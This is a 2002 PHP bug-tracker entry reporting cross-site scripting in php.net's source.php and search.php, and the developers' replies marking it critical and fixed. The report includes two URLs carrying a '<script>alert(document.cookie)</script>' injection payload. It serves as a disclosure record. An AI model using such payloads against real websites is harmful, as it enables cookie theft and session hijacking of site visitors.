PHP :: Bug #16258 :: Cross-Site scripting in php.net

Bug #16258

Cross-Site scripting in php.net

Submitted:

2002-03-25 08:57 UTC

Modified:

2002-03-25 14:23 UTC

Votes:	1
Avg. Score:	2.0 ± 0.0
Reproduced:	0 of 0 (0.0%)

From:

nopman at hackermail dot com

Assigned:

Status:

Closed

Package:

Website problem

PHP Version:

4.1.2

OS:

Unix

Private report:

CVE-ID:

None

View Add Comment Developer Edit

[2002-03-25 08:57 UTC] nopman at hackermail dot com

There is a Cross-Site scripting problem in source.php and
search.php.
One can enter following URL:
http://www.php.net/source.php?url=/<script>alert(document.cookie)</script><!--.html
And following will also work:
http://www.php.net/search.php?show=nosource&auto=1&pattern=dfighdfughfg&base="><script>alert(document.cookie)</script><!--

Regards,
NopMan

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2002-03-25 09:00 UTC] sander@php.net

Marking as critical.

[2002-03-25 14:23 UTC] jimw@php.net

This bug has been fixed in CVS.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Wed Jun 26 13:01:46 2024 UTC